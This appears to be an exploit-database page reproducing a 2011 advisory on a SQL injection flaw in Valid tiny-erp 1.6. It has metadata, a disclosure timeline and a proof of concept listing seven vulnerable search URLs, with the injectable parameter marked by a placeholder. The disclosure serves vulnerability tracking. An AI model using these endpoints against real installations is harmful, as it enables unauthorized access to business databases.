header-logo
Suggest Exploit
vendor:
Valid tiny-erp
by:
muuratsalo
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Valid tiny-erp
Affected Version From: 1.6
Affected Version To: 1.6
Patch Exists: N/A
Related CWE: N/A
CPE: validerp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Valid tiny-erp <= 1.6 SQL Injection Vulnerability

Valid tiny-erp <= 1.6 is affected by a SQL injection vulnerability. A registered account could be required to exploit the vulnerability.

Mitigation:

Input validation and proper sanitization of user input should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

------------------------------------------------------------------------
Valid tiny-erp <= 1.6 SQL Injection Vulnerability
------------------------------------------------------------------------

author............: muuratsalo (Revshell.com)
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://sourceforge.net/projects/validerp/


[0x01] Vulnerability overview:

Valid tiny-erp <= 1.6 is affected by a SQL injection vulnerability.
Note - A registered account could be required to exploit the vulnerability.


[0x02] Disclosure timeline:

[16/11/2011] - SQL injection vulnerability discovered and reported to
the vendor.
[19/11/2011] - No response from the vendor, public disclosure.


[0x03] Proof of Concept:

http://localhost/validerp/_partner_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/proioncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/_rantevou_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/syncategory_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/synallasomenos_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/ypelaton_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]
http://localhost/validerp/yproion_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
injection]